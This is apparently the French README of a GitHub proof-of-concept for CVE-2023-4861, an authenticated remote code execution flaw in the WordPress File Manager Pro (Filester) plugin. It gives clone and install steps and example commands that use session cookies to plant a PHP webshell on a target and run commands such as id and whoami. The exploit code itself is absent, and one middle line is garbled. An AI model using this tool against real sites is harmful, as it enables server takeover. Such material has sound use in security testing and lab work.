
Preuve de concept automatisée pour l'exécution de code à distance authentifiée dans WordPress File Manager Pro (Filester) via un téléversement de fichier arbitraire, incluant le déploiement d'un webshell et l'exécution de commandes.
Ce dépôt contient une preuve de concept en Python pour CVE-2023-4861, une vulnérabilité d'exécution de code à distance authentifiée dans le plugin WordPress File Manager Pro - Filester.
CVE-2023-4861File Manager Pro - Filester (filester)< 1.8.11.8.1Admin+ sur Filesterexploit.py automatise le même résultat de base décrit dans l'avis public :
/var/www/html/ et permettre le téléversement de fichiers .php.Détail d'implémentation important : mon PoC suppose que la racine web cible est /var/www/html/. Celle-ci est codée en dur dans les données de la requête et peut nécessiter un ajustement pour d'autres configurations de laboratoire.
Clonez le dépôt et entrez-y :
git clone https://github.com/nomaisthere/CVE-2023-4861-PoC.git
cd CVE-2023-4861-PoC
Installez les dépendances :
pip install requests
Afficher l'aide :
python3 exploit.py --help
Exemple de base :
python3 exploit.py --url http://target-wordpress --command id \
--cookie 'wordpress_logged_in_xxx=...; wordpress_sec_xxx=...'
Nom de shell personnalisé facultatif :
python3 exploit.py --url http://target-wordpress --shell-name shell.php --command whoami \
--cookie 'wordpress_logged_in_xxx=...; wordpress_sec_xxx=...'